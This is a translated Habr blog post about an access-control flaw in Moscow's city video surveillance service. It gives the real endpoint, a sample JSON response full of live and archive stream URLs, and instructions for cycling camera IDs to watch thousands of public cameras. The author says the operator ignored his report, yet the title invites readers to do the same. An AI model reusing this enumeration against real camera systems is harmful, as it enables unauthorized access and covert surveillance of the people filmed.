Unauthorized access was obtained to more than 20,000 video surveillance cameras in Moscow (now you too)

Hi, Habrahabr! Surely many of you remember the legendary post “The sources of 3300 global Internet projects were received ”, which for a long time was the first in the rating of all publications on the site. Despite the similar title in my post, I do not claim to be in the first place, but I think that you should pay attention.



This story began late in the evening when I lingered at work to complete an urgent task related to our partners from Amsterdam. Having finished testing the last module, I sat back in a chair with satisfaction and, out of habit, went in to check my page on VK. In one of my publics, I saw a photo from a surveillance camera with official data on it. Interested in this photo, I turned to the author of the image with a request to gain access to this camera.

To my surprise, they answered me. I was told that you can get a temporary access link, which is valid for a week and does not allow you to control the camera and watch the archive.

Link:

obmen-video.echd.ru/embed/noauth/здесь_много_соли

Being thoughtful in nature, I looked at source and found the following:

window.APP_VERSION = '0.1';
window.BUILD_ID = 'public';
window.embeddedCamera = {"id":******,"name":"MMC_***; такой-то парк","shortName":"MMC_***","address":"такой-то адрес ","description":null,"type":{"id":4,"color":"0D0D0D"},"cameraType":4,"apiType":"ECHD_CISCO_VSM","fixed":false,"status":0,"lat":"***","lng":"***"};
window.Request = {"id":"4a6a19d5-ab03-4cb1-8fc4-281345c873f5","innerId":"******","userId":***,"ttl":1422353451835}; // Mapped HTTP request (POST/GET params)

It’s easy to guess that using the following URL

http://obmen-video.echd.ru/cameraManager/ajaxGetVideoUrls?id=666&_=1421929669467

I got the following set of threads:

{"666":{"archive":{"control":["http://iStream4.echd.ru:7020/YERP5AYFE4YZQOBKUWPGCTT7YCOVF35H3KH35M5542D7VRRJZT2W7YEMSKK4ABMGWFKC6O6XRYHNPUYDZTXZ6IZ4K6K2D4Z32JVYHTZZMPPQLOQIXORE6SQ7VYXW56VAPXC6W7XEKRZRM47PZUOA3IC54IA2SQRM7UVZ5GRJLG5Z5QVU3MZD54L7Y3TUXKT37FEKQLGCTLIEXWT6BHTNWUIVWXMJ27PT4PSGWVQ/token-1422045167179-archive?rec","http://iStream5.echd.ru:26020/HRKCYL6YERQKA75CNXRQXIMA5BTK3NHBJ5ZWYDNRQEOBPNXAAHHNGEVVJETU7YCFK3EX4SXPOV4MZV4X63ULMSFYGKMEH4VGPM5AGTMD2SLKYJBJJ3IPCL54IP6UEE3T7Y2M5WLHCIIDEU4L6SGIICY35JRUYPBV4TPHSOIONYI43SQ2FJHOCJIRYHVB6XL7VBWNBEN6TDNTLBSCLLF3I5BZQC3ZKKLSH6OTTVQ/token-1422045167179-archive?rec"],"shot":{"control":["http://iStream4.echd.ru:7020/YERP5AYFE4YZQOBKUWPGCTT7YCOVF35H3KH35M5542D7VRRJZT2W7YEMSKK4ABMGWFKC6O6XRYHNPUYDZTXZ6IZ4K6K2D4Z32JVYHTZZMPPQLOQIXORE6SQ7VYXW56VAV6YN676UFMPOA5IAVYQRPTSGHYJRLEBV6BMZJLIIS6HEEV4HSTY3CQ6NSIVAQCKZH3VHGASAUT5CO/token-1422045167183-archiveSnapshot","http://iStream5.echd.ru:26020/HRKCYL6YERQKA75CNXRQXIMA5BTK3NHBJ5ZWYDNRQEOBPNXAAHHNGEVVJETU7YCFK3EX4SXPOV4MZV4X63ULMSFYGKMEH4VGPM5AGTMD2SLKYJBJJ3IPCL54IP6UEE3TRT4ZAOLGKV3N773W4C77HX3OCGGKPPKK3PXJD33DIM2IXV7KB6RSS6W77H7EZOEUDHGJYBBHSDBUC/token-1422045167183-archiveSnapshot"],"url":["http://iStream4.echd.ru:7020/YERP5AYFE4YZQOBKUWPGCTT7YCOVF35H3KH35M5542D7VRRJZT2W7YEMSKK4ABMGWFKC6O6XRYHNPUYDZTXZ6IZ4K6K2D4Z32JVYHTZZMPPQLOQIXORE6SQ7VYXW56VAV6YN676UFMPOA5IAVYQRPTSGHYJRLEBV6BMZJLIIS6HEEV4HSTYTTINJRDZ2GL7WOO7SZ7ZPBCHYI/token-1422045167183-archiveSnapshot?shot","http://iStream5.echd.ru:26020/HRKCYL6YERQKA75CNXRQXIMA5BTK3NHBJ5ZWYDNRQEOBPNXAAHHNGEVVJETU7YCFK3EX4SXPOV4MZV4X63ULMSFYGKMEH4VGPM5AGTMD2SLKYJBJJ3IPCL54IP6UEE3TRT4ZAOLGKV3N773W4C77HX3OCGGKPPKK3PXJD33DIM2IXV7KB6R2H6KF2MR6CEMATGWCCCTHISRR7FT2YTBP4YYIJ3OL2NO2H3HNFKA/token-1422045167183-archiveSnapshot?shot"]},"url":["http://iStream4.echd.ru:7020/YERP5AYFE4YZQOBKUWPGCTT7YCOVF35H3KH35M5542D7VRRJZT2W7YEMSKK4ABMGWFKC6O6XRYHNPUYDZTXZ6IZ4K6K2D4Z32JVYHTZZMPPQLOQIXORE6SQ7VYXW56VAWITQRF3YOGFW4MY5G6HIXB4Q4BJWMEAUFWUSDRYIHMSSV7TIERGLPA6ZSKAH4PZBIWTHDGHUUZC7MN63V4EQVDG6ZG7WB3UJPLFPN2UMVPLN4FQQGMPK2LHN6DPZ7WWD/token-1422045167179-archive?recarchive","http://iStream5.echd.ru:26020/HRKCYL6YERQKA75CNXRQXIMA5BTK3NHBJ5ZWYDNRQEOBPNXAAHHNGEVVJETU7YCFK3EX4SXPOV4MZV4X63ULMSFYGKMEH4VGPM5AGTMD2SLKYJBJJ3IPCL54IP6UEE3T63RJ6RODZTXZJFRMZSVUTHTK5UJRLEBV6BMZJLIIS6HEEV4HSTYSPCZMFZXP3LMKAHRSDZZ5COMCC2ITAXECLVW2LULL5TAEYY3U6H34HIN4ZH6WS55JQNX57IB3X6RY/token-1422045167179-archive?recarchive"]},"live":{"ios":{"url":["http://iStream4.echd.ru:7020/YERP5AYFE4YZQOBKUWPGCTT7YCOVF35H3KH35M5542D7VRRJZT2W7YEMSKK4ABMGWFKC6O6XRYHNPKQWXTJMRZUUPCNKVNGWVT5MV3RZMPPQLOQIXORE6SQ7VYXW56VACWZDB6LQB7JO7MVPL4QBAM5LAFJWMEAUFWUSDRYIHMSSV7TIERGA2ISAPZHDCKR4FQWNRCYQB3XM4/token-1422045167167-live?m3u","http://iStream5.echd.ru:26020/HRKCYL6YERQKA75CNXRQXIMA5BTK3NHBJ5ZWYDNRQEOBPNXAAHHNGEVVJETU7YCFK3EX4SXPOV4MYJ4M3MY7A76J3LAIAGQRVJ3QDHED2SLKYJBJJ3IPCL54IP6UEE3TV43JQYUDH6HFPFF5WDDH4HS2CEJRLEBV6BMZJLIIS6HEEV4HSTYQ47LXC65XYUJF2LA4ICOS7QXVY/token-1422045167167-live?m3u"]},"shot":{"url":["http://iStream4.echd.ru:7020/YERP5AYFE4YZQOBKUWPGCTT7YCOVF35H3KH35M5542D7VRRJZT2W7YEMSKK4ABMGWFKC6O6XRYHNPKQWXTJMRZUUPCNKVNGWVT5MV3RZMPPQLOQIXORE6SQ7VYXW56VACWZDB6LQB7JO7MVPL4QBAM5LAFJWMEAUFWUSDRYIHMSSV7TIERGA2ISAPZHDCKR4FQWNRCYQB3XM4/token-1422045167174-liveSnapshot?shot","http://iStream5.echd.ru:26020/HRKCYL6YERQKA75CNXRQXIMA5BTK3NHBJ5ZWYDNRQEOBPNXAAHHNGEVVJETU7YCFK3EX4SXPOV4MYJ4M3MY7A76J3LAIAGQRVJ3QDHED2SLKYJBJJ3IPCL54IP6UEE3TV43JQYUDH6HFPFF5WDDH4HS2CEJRLEBV6BMZJLIIS6HEEV4HSTYQ47LXC65XYUJF2LA4ICOS7QXVY/token-1422045167174-liveSnapshot?shot"]},"url":["http://iStream4.echd.ru:7020/YERP5AYFE4YZQOBKUWPGCTT7YCOVF35H3KH35M5542D7VRRJZT2W7YEMSKK4ABMGWFKC6O6XRYHNPKQWXTJMRZUUPCNKVNGWVT5MV3RZMPPQLOQIXORE6SQ7VYXW56VACWZDB6LQB7JO7MVPL4QBAM5LAFJWMEAUFWUSDRYIHMSSV7TIERGA2ISAPZHDCKR4FQWNRCYQB3XM4/token-1422045167167-live","http://iStream5.echd.ru:26020/HRKCYL6YERQKA75CNXRQXIMA5BTK3NHBJ5ZWYDNRQEOBPNXAAHHNGEVVJETU7YCFK3EX4SXPOV4MYJ4M3MY7A76J3LAIAGQRVJ3QDHED2SLKYJBJJ3IPCL54IP6UEE3TV43JQYUDH6HFPFF5WDDH4HS2CEJRLEBV6BMZJLIIS6HEEV4HSTYQ47LXC65XYUJF2LA4ICOS7QXVY/token-1422045167167-live"]},"version":100}}

You can access the camera stream with an arbitrarily selected ID. The first streams are camera archives, the last one is real-time broadcast.

Opening the URL with any player (VLC, for example), we can see the following:



This camera is not very indicative in terms of image quality, but the initial stream MMC_ produced a pretty decent picture with a good frame rate.

In short. Paste the link of the form obmen-video.echd.ru/cameraManager/ajaxGetVideoUrls?id=XXX&_=1421929669467 into the browser (where XXX is an arbitrary identifier, I tried numbers from 50 to 20,000), you get a set of streams that you can insert into your media player on your smartphone and with due persistence you can see yourself smoking at the entrance of your house ...



As you might guess, all of this belongs to the ECHR (Unified Data Storage Center) - I tried to contact them about the vulnerability, but I never received a response. I hope that after this publication the error will still be fixed.

Thanks for attention.

Also popular now: